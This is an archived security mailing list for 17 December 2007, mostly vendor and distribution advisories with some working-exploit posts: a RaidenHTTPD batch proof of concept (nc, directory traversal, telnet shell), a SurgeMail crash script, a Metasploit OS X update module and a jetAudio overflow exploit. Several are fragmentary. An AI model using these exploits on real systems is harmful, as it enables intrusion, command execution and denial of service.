rPSA-2007-0268-1 kdebase

2007-12-17 Thread rPath Update Announcements
rPath Security Advisory: 2007-0268-1
Published: 2007-12-17
rPath Linux 1

Rating: Major
Exposure Level Classification:
Local Deterministic Denial of Service
Updated Versions:
[EMAIL PROTECTED]:1/3.4.2-3.15-1

rPath Issue Tracking System:


Previous versions of the kdebase package are vulnerable to Denials of
Service in which a local user can render KDM unusable for logins by any
user or cause KDM to exceed system resource limits.

In its default configuration, rPath Linux 1 is not vulnerable to the
Denial of Service against KDM logins.


Copyright 2007 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html

Apple OS X Software Update Remote Command Execution

2007-12-17 Thread Moritz Jodeit
Apple Mac OS X Software Update Remote Command Execution Vulnerability

Copyright (c) 2007 Moritz Jodeit <[EMAIL PROTECTED]> (2007/12/17)

I. Vulnerability Description

The OS X Software Update mechanism uses so called `distribution packages' [1],
which basically consist of two parts. The XML `catalog file', which lists the
available updates and the `distribution definition files' [1], which contain
information encoded in XML and JavaScript, defining every aspect of the
user experience, when installing an update.

When OS X checks for new updates, it first contacts swscan.apple.com
to receive the XML catalog file. This file references the distribution
definition files, which can reside on another server. Software Update
receives these files and calls some of the JavaScript functions to check,
if the update is suited for the local machine.

The catalog file and the distribution definition files are both received
using HTTP whithout any authentication. By running a malicious update server,
it is possible to provide distribution definition files, which execute
arbitrary commands using JavaScript on the remote machine requesting the
update. The System.run() method can be used for this, if the
`allow-external-scripts' option was set in the distribution definition
file, as documented in the "Installer JavaScript Reference" [2].


II. Impact

Combined with the ability to intercept requests to the official Apple update
server by other means like ARP or DNS spoofing, it is possible to execute
arbitrary commands on all clients requesting updates. OS X automatically
checks for updates at regular intervals (default is weekly), which allows
for exploitation, even without any user intervention.

III. Solution

This vulnerability was fixed with the latest Apple update APPLE-SA-2007-12-17.

IV. Vendor Response

2007/12/06  Initial contact with <[EMAIL PROTECTED]>
2007/12/06  Acknowledgement of received report
2007/12/12  Agreement on public release date
2007/12/17  Coordinated release of updates and advisory

V. Proof Of Concept

# $Id$

# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/

require 'msf/core'

module Msf

class Exploits::Osx::Browser::Software_Update < Msf::Exploit::Remote

include Exploit::Remote::HttpServer::HTML

def initialize(info = {})
'Name'   => 'Apple OS X Software Update Command 
'Description'=> %q{
This module exploits a feature in the 
Distribution Packages,
which are used in the Apple Software Update mechanism. 
This feature
allows for arbitrary command execution through 
JavaScript. This exploit
provides the malicious update server. Requests must be 
redirected to
this server by other means for this exploit to work.
'Author' => [ 'Moritz Jodeit <[EMAIL 
'License'=> MSF_LICENSE,
'Version'=> '$Revision$',
'References' =>
['CVE', '2007-5863'],
'BadChars' => "\x00",
'DisableNops' => true,
'Platform'  => 'osx',
'Targets'   =>
'Platform' => [ 'unix' 
'Arch' => ARCH_CMD,
'DisclosureDate' => 'Dec 17 2007',
'DefaultTarget'  => 0))

OptPort.new('SRVPORT', [ true, "The local port 
to listen on.", 80 ]),

Uber Uploader <= 5.3.6 Remote File Upload Vulnerability

2007-12-17 Thread sys-project
# Uber Uploader <= 5.3.6 Remote File Upload Vulnerability

# Download:

# http://sourceforge.net/projects/uber-uploader

# Bug found by JosS / Jose Luis Góngora Fernández

# Contact: sys-project[at]hotmail.com

# Spanish Hackers Team

# www.spanish-hackers.com

# /server irc.freenode.net /join #fullsecure


There isn't any kind of file extentions check in: "uu_file_upload.js" and  


you can submit files with extensions like: .html, .txt, .asp, etc...

you can upload all extensions, except: sh, php, php3,php4, php5, py, shtml, 
phtml, cgi, pl, plx, htaccess, htpasswd.





Once the file is uploaded you can see it in /uploads/



To fix it, you have to modify "Check for illegal file extentions" and "Check 
for legal file extentions" in the file "uu_file_upload.js" or 

It doesn't go on if its diferent to the allowed extensions.


// Check for illegal file extentions

function checkAllowFileExtensions(){

if(!check_allow_extensions){ return true; }


alert('Sorry, uploading a file with the extension "' + file_extension + '" is 
not allowed.');

return true;



// Check for legal file extentions

function checkAllowFileExtensions(){

if(!check_allow_extensions){ return false; }


alert('Sorry, uploading a file with the extension "' + file_extension + '" is 
not allowed.');

return true;





"Powered By Uber Uploader"

allinurl: uu_file_upload.php

allinurl: uber_uploader_file.php


Greetz To: All Hackers

JosS! / Jose Luis Góngora Fernández 

[SECURITY] [DSA 1432-1] New link-grammar packages fix execution of code

2007-12-17 Thread Steve Kemp
Hash: SHA1

Debian Security Advisory DSA-1432-1  [EMAIL PROTECTED]
http://www.debian.org/security/   Steve Kemp
December 16, 2007 http://www.debian.org/security/faq

Package: link-grammar
Vulnerability  : buffer overflow
Problem type   : local
Debian-specific: no
CVE Id(s)  : CVE-2007-5395
Debian Bug : 450695

Alin Rad Pop discovered that link-grammar, Carnegie Mellon University's
link grammar parser for English, performed insufficient validation within
its tokenizer, which could allow a malicious input file to execute
arbitrary code.

For the stable distribution (etch), this problem has been fixed in version

For the old stable distribution (sarge), this package was not present.

For the unstable distribution (sid), this problem was fixed in version

We recommend that you upgrade your link-grammar package.

Upgrade instructions

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch
- ---

Source archives:

Size/MD5 checksum:   742163 798c165b7d7f26e60925c30515c45782
Size/MD5 checksum:  669 535a962c3aefbf92b3d09bd9355d3b57
Size/MD5 checksum: 8231 fa03dfbb7a2e0a47130c9f1385eb48d3

Architecture independent packages:

Size/MD5 checksum:   267530 52ef5d6278b5f8a5a0c0894b3d99235e

alpha architecture (DEC Alpha)

Size/MD5 checksum:   169386 f866bf37b179cf8f1c31f13b0ab9100a
Size/MD5 checksum:1 14b288d946738d5eefed5dc50e84040f
Size/MD5 checksum:   108456 826d5896c36850255bedfcc3b70a8ea1

amd64 architecture (AMD x86_64 (AMD64))

Size/MD5 checksum:16038 ea80489f9db4f247d5009bf435f40707
Size/MD5 checksum:95996 0851ea02bd3b4b600d68df09016915cf
Size/MD5 checksum:   127934 a43908000f552820cdcd2c1a7819f62f

arm architecture (ARM)

Size/MD5 checksum:15074 5a881ae17e13efc9ae731b9f86d7a0ff
Size/MD5 checksum:   110896 54d4534ce7a06ed675d9c4d2c957e519
Size/MD5 checksum:87732 5dfce7e3245ab16bbab0f2325d462192

hppa architecture (HP PA RISC)

Size/MD5 checksum:16202 3f8cbe2ab057f5d3b387c1e52e4e9e51
Size/MD5 checksum:   139488 2411aae738f8467e4180debc87b265ee
Size/MD5 checksum:   104292 105899d1fa1a37a2690a6d3372572912

i386 architecture (Intel ia32)

Size/MD5 checksum:15458 9b43845e6fdb26319c4dd3d88afe5fb4
Size/MD5 checksum:89456 ffa178b41a336d1a9e11bca02a3d2232
Size/MD5 checksum:   111356 50b911abcf

SurgeMail v.38k4 webmail Host header crash

2007-12-17 Thread retrog";;


$header ="POST / HTTP/1.0\r\n";

$header.="Host: $puf\r\n";

$header.="Connection: Close\r\n\r\n";


$ch = curl_init();

curl_setopt($ch, CURLOPT_URL,$url);

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($ch, CURLOPT_TIMEOUT, 0);

curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $header);

$data = curl_exec($ch); if (curl_errno($ch)) {

   print curl_error($ch)."\n";

} else {




original url: http://retrogod.altervista.org/rgod_surgemail_crash.html

RaidenHTTPD 2.0.19 ulang cmd exec poc exploit

2007-12-17 Thread retrog
rem raidenhttpdudo.cmd

  @echo off

  color 0a

rem RaidenHTTPD 2.0.19 ulang cmd exec poc exploit 

rem WebAdmin one - not enabled by default anymore 

rem however works regardless of  php.ini, because 

rem "ulang" comes from $_GET[] and some magic_quo

rem tes_gpc disable code,lame  divertissement one

rem to demonstrate an  unauthenticated  directory 

rem traversal  ...

rem rgod --http://violentcop.splinder.com

 if {%1}=={} goto kill

echo HEAD /?^ 

echo Host: %1>>in & echo Connection: Close>>in & echo.>>in

nc %1 80 -v -w1< in > nul

echo ..\..\..\logs\access_%date:~6,4%-%date:~3,2%-%date:~0,2%.log%%00> puf & 
set /p exploit=< puf 

echo GET 
 HTTP/1.1> in

echo Host: %1>>in & echo Connection: Close>>in & echo.>>in

echo please wait ...

nc %1 80 -v -w1< in > nul

ping localhost -n 15>nul & rem delaying ...

del puf

del in

telnet %1 23

goto nowhere


echo %0 [target-host]



original url: http://retrogod.altervista.org/rgod_raidenhttpdudo.html

rPSA-2007-0266-1 tetex tetex-afm tetex-dvips tetex-fonts tetex-latex tetex-xdvi

2007-12-17 Thread rPath Update Announcements
rPath Security Advisory: 2007-0266-1
Published: 2007-12-17
rPath Linux 1

Rating: Minor
Exposure Level Classification:
Indirect User Deterministic Unauthorized Access
Updated Versions:
[EMAIL PROTECTED]:1/2.0.2-28.9-1
[EMAIL PROTECTED]:1/2.0.2-28.9-1
[EMAIL PROTECTED]:1/2.0.2-28.9-1
[EMAIL PROTECTED]:1/2.0.2-28.9-1
[EMAIL PROTECTED]:1/2.0.2-28.9-1
[EMAIL PROTECTED]:1/2.0.2-28.9-1

rPath Issue Tracking System:


Previous versions of the tetex package are vulnerable to multiple
attacks, the most serious of which allow user-assisted attackers to
execute arbitrary code when dvips or dviljk are run on maliciously
crafted DVI files.


Copyright 2007 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html

Heap overflow in PeerCast 0.1217

2007-12-17 Thread Luigi Auriemma


 Luigi Auriemma

Application:  PeerCast
Versions: <= 0.1217 and SVN <= 344
Platforms:Windows, plugin for Winamp, Linux and Mac
Bug:  heap overflow
Exploitation: remote
Date: 17 Dec 2007
Author:   Luigi Auriemma


1) Introduction
2) Bug
3) The Code
4) Fix


1) Introduction

PeerCast is a multi platform open source software for peer2peer radio
The broadcasters are visible at http://yp.peercast.org


2) Bug

The handshakeHTTP function which handles all the requests received by
the other clients is vulnerable to a heap overflow which allows an
attacker to fill the loginPassword and loginMount buffers located in
the Servent class with how much data he wants.

>From servhs.cpp:

void Servent::handshakeHTTP(HTTP &http, bool isHTTP)
char *in = http.cmdLine;
}else if (http.isRequest("SOURCE"))
if (!isAllowed(ALLOW_BROADCAST))
mount = in+strlen(in);
while (*--mount)
if (*mount == '/')
mount[-1] = 0; // password preceeds
if (mount)

ALLOW_BROADCAST ("allowBroadcast" in peercast.ini) is enabled by


3) The Code



4) Fix

Version 0.1218 or SVN 347


Luigi Auriemma

Re: Wordpress - Broken Access Control

2007-12-17 Thread otto
The is_admin() function is not supposed to tell whether a user is an 
administrator or not, it tells whether the user is looking at one of the 
administration pages. As such, this function does exactly what it is supposed 
to do.

As for the rest, there is no flaw. To view a draft, the user must authenticate 
and have the correct capability set. There is no way to view drafts without 
being logged in and having that capability set on the user's role level.

This "vulnerability" is non-existent.

release uhooker v1.3

2007-12-17 Thread Hernan Ochoa
What's uhooker?:

A tool to intercept and manipulate execution of programs. It enables
the user to insert hooks in function calls and arbitrary addresses
within the executable file in memory. The hooks handlers are written
in Python and can be changed at runtime without the need to restart
the inspected process.



more info:


Some Videos:


What's new in uhooker v1.3?

-Several bug fixes, everything should work better than before :)

-Fixed bug with readunicode() API where reading empty multibyte strings,
resulted in the plugin freezing for ever.

-Now you can load multiple .CFG files (load one, then load another to hook
something else, etc). Previously, you were only allowed to load one .CFG file
with breakpoints/handlers definitions. Now you can load as many as you like
whenever you want.

-If a .CFG file overlaps previously set hooks, you have the chance
to redefine them (for example, you can dinamically change the
file/function handling the breakpoint. This adds to the feature
present since the first version of uhooker that allows runtime rewriting
of the handler's code).

-Errors in the code of the handlers (written in python) are now
correctly handled.

-Previously, if you had an error in the code you wrote to handle
certain breakpoint, this caused the 'uhooker's python server' to
'crash', and you needed to restart your debugging session all 

This scenario was very common, particuarly if you were 
your own handler/script for the first time, or if you were
modifying at runtime the code of a handler/script.

Well, no more! :), Now if you have an error (syntax error,
identation error, general programming error,etc), the error that
your handler has will be displayed on the uhooker's console, and
you'll be able to recover from that error. This improvement 

1-If an error occurs on the code, you don't
need to restart the debugger's session (and lose
the state of the program, etc.).

2-If you are changing in runtime the code of the
handler, and you makee a mistake, you'll see 
caused the error, and you can fix the 
and move on!.

-and there are probably more things but I didn't write them down and
now I dont't remember :).

[SECURITY] [DSA 1434-1] New mydns packages fix denial of service

2007-12-17 Thread Thijs Kinkhorst
Hash: SHA1

Debian Security Advisory DSA-1434-1  [EMAIL PROTECTED]
http://www.debian.org/security/  Thijs Kinkhorst
December 16, 2007 http://www.debian.org/security/faq

Package: mydns
Vulnerability  : buffer overflow
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2007-2362

It was discovered that in MyDNS, a domain name server with database
backend, the daemon could be crashed through malicious remote update
requests, which may lead to denial of service.

For the stable distribution (etch), this problem has been fixed in
version 1:1.1.0-7etch1.

The old stable distribution (sarge) is not affected.

For the unstable distribution (sid), this problem has been fixed in
version 1.1.0-8.

We recommend that you upgrade your mydns packages.

Upgrade instructions

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian 4.0 (stable)
- ---

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, 
mipsel, powerpc, s390 and sparc.

Source archives:

Size/MD5 checksum: 1016 6d0a22d23d6a218b2f6c36a0973fec29
Size/MD5 checksum:23201 68288d6559240f652b363175077ee372

alpha architecture (DEC Alpha)

Size/MD5 checksum:   283646 605abae7c94de5d29b3c0b2e627ba3de
Size/MD5 checksum:   276524 2ba115052634baec10286c91a5cc6ce6

amd64 architecture (AMD x86_64 (AMD64))

Size/MD5 checksum:   261562 fb735c256a150474a83b162823817666
Size/MD5 checksum:   254146 57ff5991069034d7c97be430b8149aaa

arm architecture (ARM)

Size/MD5 checksum:   244500 8361e2dfe50de8abb41d97c0bde6c8fa
Size/MD5 checksum:   233926 3410cf9b02fea32800f7273b0db312c3

hppa architecture (HP PA RISC)

Size/MD5 checksum:   259956 dd54add61133e98ca326ffbba9d45491
Size/MD5 checksum:   267084 d457000b6afc8dcf160e06f91e5449d8

i386 architecture (Intel ia32)

Size/MD5 checksum:   249396 a0d5f307f3eedfc6c85a587cc5572463
Size/MD5 checksum:   241112 a2ef881adaf58f206315b6843f6e0f0f

ia64 architecture (Intel ia64)

Size/MD5 checksum:   336738 80c0da6e223de21d5d13ee34667c17ec
Size/MD5 checksum:   342716 4f95f73ebe81ae596edeae7145a55be9

mips architecture (MIPS (Big Endian))

Size/MD5 checksum:   257376 e607aff2b4d31066337d10a6168831a8
Size/MD5 checksum:   264792 c1f711aa974118740dd077078004a0bc

mipsel architecture (MIPS (Little Endian))

Size/MD5 checksum:   257854 10b2f0d2ad613f24d9a1a316fd5c3699
Size/MD5 checksum:   265208 ec23fa6fb9fcd9c2422ff61838b65a04

powerpc architecture (PowerPC)

Size/MD5 checksum:   257796 7e94fa5255766b49edf123c1e1546aa0

[SECURITY] [DSA 1433-1] New centericq packages fix execution of code

2007-12-17 Thread Steve Kemp
Hash: SHA1

Debian Security Advisory DSA-1433-1  [EMAIL PROTECTED]
http://www.debian.org/security/   Steve Kemp
December 16, 2007 http://www.debian.org/security/faq

Package: centericq
Vulnerability  : buffer overflow
Problem type   : remote
Debian-specific: no
CVE Id(s)  : CVE-2007-3713

Several remote vulnerabilities have been discovered in centericq,
a text-mode multi-protocol instant messenger client, which could allow
remote attackers to execute arbitary code due to insufficient bounds-testing.

For the stable distribution (etch), this problem has been fixed in version

For the old stable distribution (sarge), this problem has been fixed in
version 4.20.0-1sarge5.

We recommend that you upgrade your centericq package.

Upgrade instructions

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.1 alias sarge

Source archives:

Size/MD5 checksum:  875 0e3de98bb55d5af241acbb7c42c47cd0
Size/MD5 checksum:   117817 a0d486891cbf0dbafd36acda7d329e7a
Size/MD5 checksum:  1796894 874165f4fbd40e3be677bdd1696cee9d

alpha architecture (DEC Alpha)

Size/MD5 checksum:  1651664 69022dfe5342b1056abca9c9b433532d
Size/MD5 checksum:   337338 b408f37c75ebff4cca8e0fd9bae2a2e2
Size/MD5 checksum:  1652642 b1e027154c70c15250c131bcd1584c30
Size/MD5 checksum:  1651712 1fc9e5fbf1d193d8d6ec6c2fa9cf28bf

amd64 architecture (AMD x86_64 (AMD64))

Size/MD5 checksum:   335496 e89f821a32c11d314b397ee454da5094
Size/MD5 checksum:  1355704 f3371f5f48e1057f1fb80714c0ea98bc
Size/MD5 checksum:  1355942 dbaa8f53bcddceb3828e3b8b857bf833
Size/MD5 checksum:  1355764 2752c6ff95628f99693521617bc32d73

arm architecture (ARM)

Size/MD5 checksum:  2184304 34cd68e7c3f0374c40e545a61446f48c
Size/MD5 checksum:  2185094 7cbfa8db84b905a267ddf518415a7553
Size/MD5 checksum:   336124 19e8fc68148e1ebc8dc6a51c2c488689
Size/MD5 checksum:  2184366 b5ac5dffa73e7273a3e03b91e4413be0

hppa architecture (HP PA RISC)

Size/MD5 checksum:  1812692 c21a00400546a5fbf571cf517bd34657
Size/MD5 checksum:  1813624 f48400ea56e3027d2e828b3353442131
Size/MD5 checksum:   336228 035a6af70173afb011a9a77631bdab3b
Size/MD5 checksum:  1812750 10f3220cf0a0334113b4eb6b03e7f63c

i386 architecture (Intel ia32)

Size/MD5 checksum:  1350010 fbf767b42da3ffc738073577afea697a

jetAudio 7.0.5 COWON Media Center MP4 Stack Overflow

2007-12-17 Thread gforce
another vulnerable application.



# jetAudio 7.0.5 COWON Media Center MP4 Stack Overflow


# 0-day discovered and exploited by SYS 49152


# Tested on win XP SP2 ENG

# Shell on port 49152


# usage:

# - download the latest 3ivx codec from here:

#   hxxp://www.3ivx.com/codec/3ivx_MPEG-4_501_trial_win.exe


# - play the AVI file with COWON Media Center 


# Maybe I will add more vulnerable apps if I have time.

# SYS 49152


# gforce(put the @ here)operamail(put the . here)com

use Archive::Zip qw( :ERROR_CODES :CONSTANTS ); 

# begin binary data:

$bin_data = # 3289





































































PHP Security Framework: Vuln and Security Bypass

2007-12-17 Thread gmdarkfig
   Title:   PHP Security Framework (Beta 1)

Multiple Vulnerabilities and Security Bypass

  Vendor:   http://benjilenoob.66ghz.com/projects/

Advisory:   http://acid-root.new.fr/?0:16

  Author:   DarkFig < gmdarkfig (at) gmail (dot) com >

 Released on:   2007/12/16

   Changelog:   2007/12/16

 Summary:   [HT] Remote File Inclusion

[MT] SQL Injection

[MT] SQL Injection Protection Bypass

[__] Conclusion

  Legend:   L - Low risk M - Medium risk

H - High riskT - Tested

  Risk level:   High

 CVE:   --


  The file "lib/base.inc.php" contains the following code:

  10| include_once("$MODEL_DIR/FrameworkPage.class.php");

  15| include_once("$COMMON_DIR/adodb/adodb-active-record.inc.php");

  26| include_once("$DAO_DIR/Administrator.class.php");

  35| include_once("$LOGIC_DIR/AdministratorLogic.class.php");

  As you can see, all variables aren't sanatized before

  being used. So this can lead to RFI if the php directives

  allow_url_fopen and allow_url_include are set to On. This

  can also lead to LFI if the php directive magic_quotes_gpc

  is set to Off.

  Proof Of Concept:



  The author shouldn't use variables for the inclusions, the

  best way to protect against this type of vulnerability is

  to use constants because they can't be registered by

  register_globals if they're properly defined (no variables



  The script supports several server databases, Oracle

  included. So the script must also be secured for this type

  of server database.

  In a recent research that I have done, I found that

  60% of the PHP scripts which support Oracle aren't safe !

  People think that if they use the function addslashes()

  on a string which has quotes, they'll be secured

  against SQL Injection. On MySQL that's roughly true, but

  on Oracle that's wrong.

  The escape character for MySQL is a backslashes, \x92[\].

  The escape character for Oracle is a single quote, \x39['].

  The script has a user interface for the administrators.

  The file "lib/control/AuthentificationController.class.php"

  contains the following code:

   4| public function __construct()

   5| {

   6| $FrameworkPage = FrameworkPage::getInstance();

   7| $FrameworkPage->setHeadTitle("Authenfication Form");

   8| $FrameworkPage->setPageTitle("PHPSecurityFramework");


  10| if(isset($_REQUEST['username']) && isset($_REQUEST['password']))

  11| $this->Login($_REQUEST['username'], $_REQUEST['password']);

  12| }


  14| public function Login($username, $password)

  15| {

  16| $username = addslashes($username);

  17| $password = md5($password);

  18| $AdministratorLogic = new AdministratorLogic();


  20| if($AdministratorLogic->validateAdministrator($username,$password))

  22| session_register('psf_admin');

  The function addslashes() is applied to $username, after

  the function valideAdministrator() is called with two

  parameters. This function contains the following code:

  10| public function validateAdministrator($username, $password)

  11| {

  12| if(is_string($username) && is_string($password))

  13| {

  14| $Admin = new Administrator();


  16| if( ($Admin->load("username=?", array($username))) !==false)

  17| {

  18|   if($Admin->md5password==$password)

  19|   return true;

  The code for the Administrator class is situated in the

  file "lib/dao/Administrator.class.php":

  2| class Administrator extends ADOdb_Active_Record

  3| {

  4|public $_table = 'psf_administrator';

  5| }

  The function load() contains this code (situated in


  384|  function Load($where,$bindarr=false)

  385|  {

  386|  $db =& $this->DB(); if (!$db) return false;

  387|  $this->_where = $where;


  389|  $save = $db->SetFetchMode(ADODB_FETCH_NUM);

  390|  $row = $db->GetRow("select * from ".$this->_table.' WHERE 

  391|  $db->SetFetchMode($save);


  393|  return $this->Set($row);

  394|  }

  I will take an example to explain how it works.

  Let's send this HTTP packet:

  POST /PSF/index.php?page=authentification HTTP/1.1\r\n

  Host: localhost\r\n

  Connection: keep-alive\r\n

  Content-Type: application/x-www-form-urlencoded\r\n

  Content-Length: 66\r\n\r\n


  The SQL request will be like this:

  select * from psf_administrator WHERE username='root\\\''

  If we're on MySQL there's no problem, but if we're on

  Oracle, this return an error: ORA-01756: quoted string

  not properly terminated. 

Re: [syslog-ng] ZSA-2007-029: syslog-ng Denial of Service

2007-12-17 Thread Balazs Scheidler

On Mon, 2007-12-17 at 11:38 +0100, Balazs Scheidler wrote:
>    Z o r p  S e c u r i t y  A d v i s o r y   ( Z S A ) 
> PACKAGE : syslog-ng, syslog-ng-premium-edition
> AFFECTED VERSION: <= 2.0.6, 2.1.8
> FIXED   : 2.0.6, 2.1.8

Sorry for the mistake, but the above of course reads that anything
"below" 2.0.6 or 2.1.8 is affected, but 2.0.6 and 2.1.8 are fixed.

Sorry for the confusion.


ZSA-2007-029: syslog-ng Denial of Service

2007-12-17 Thread Balazs Scheidler

   Z o r p  S e c u r i t y  A d v i s o r y   ( Z S A ) 
PACKAGE : syslog-ng, syslog-ng-premium-edition
AFFECTED VERSION: <= 2.0.6, 2.1.8
FIXED   : 2.0.6, 2.1.8
SUMMARY : Denial of Service
TYPE: remote
AFFECTED: all platforms
ZSA-ID  : ZSA-2007-029
DATE: Dec 14, 2007


   Oriol Carreras has discovered a security vulnerability in syslog-ng, the
   multi-platform syslog-replacement application developed by BalaBit IT


   Earlier versions of syslog-ng Open Source Edition and syslog-ng Premium
   Edition were vulnerable to a possible Denial of Service. The latest
   release (2.0.6 for syslog-ng, 2.1.8 for syslog-ng Premium Edition) fixes a
   segmentation fault which occurred when the timestamp of the incoming
   messages did not end with a space character (NULL pointer dereference).
   This is an easy Denial of Service possibility.

   Apart from the Denial of Service, no further exploits are known to be


   For further information on syslog-ng, visit
   or download the documentation of syslog-ng from


   We recommend that you update the affected packages immediately, or apply 
   the patch referenced below:



   If you are a syslog-ng Open Source Edition user, download the source of the
   latest release from:


   If you are a syslog-ng Premium Edition user, or have binary subscription for
   syslog-ng Open Source Edition, download the latest binaries from:


   OR, if you have a platform that is supported by apt-get, use the following
   apt sources to fetch the latest releases:

   Debian GNU/Linux


 deb https://USERNAME:[EMAIL PROTECTED]/syslog-ng/premium/ 
debian-etch/syslog-ng-2.1 syslog-ng-pe

   RedHat Enterprise Linux


 rpm https://USERNAME:[EMAIL PROTECTED]/syslog-ng/premium/ 
rhel-4/syslog-ng-2.1 syslog-ng-pe

   SUSE 10

   SUSE 10.0

 rpm https://USERNAME:[EMAIL PROTECTED]/syslog-ng/premium/ 
suse-10.0/syslog-ng-2.1 syslog-ng-pe

   SUSE 10.1

 rpm https://USERNAME:[EMAIL PROTECTED]/syslog-ng/premium/ 
suse-10.1/syslog-ng-2.1 syslog-ng-pe

   HTTP can also be used in the place of HTTPS If your version of apt-get
   does not support the HTTPS protocol. When using plain HTTP,
   the username and password will not be encrypted.

Description: This is a digitally signed message part

Re: PHP MySQL Banner Exchange 2.2.1 remote mysql database bug

2007-12-17 Thread theredc0ders
to fix this bug, vendor have just to put an .htaccess "inc" folder with the 
following code

Deny from all

or rename the file to lib.inc.php


neuron news1.0 Multiple Remote Vulnerabilities (sql injection/xss)

2007-12-17 Thread hadihadi_zedehal_2006


   #  #

   #  ...:neuron news1.0 Multiple Remote Vulnerabilities  #

   #(sql injection/xss)   # 


Virangar Security Team



Discoverd By : virangar security team

(hadihadi & black.shadowes)


special tnx to:MR.nosrati,MR.hesy,satan,Zahra

& all virangar members & all iranian hackerz

greetz:to my best friend in the world hadi_aryaie2004


1.sql injection:






g00d l0uck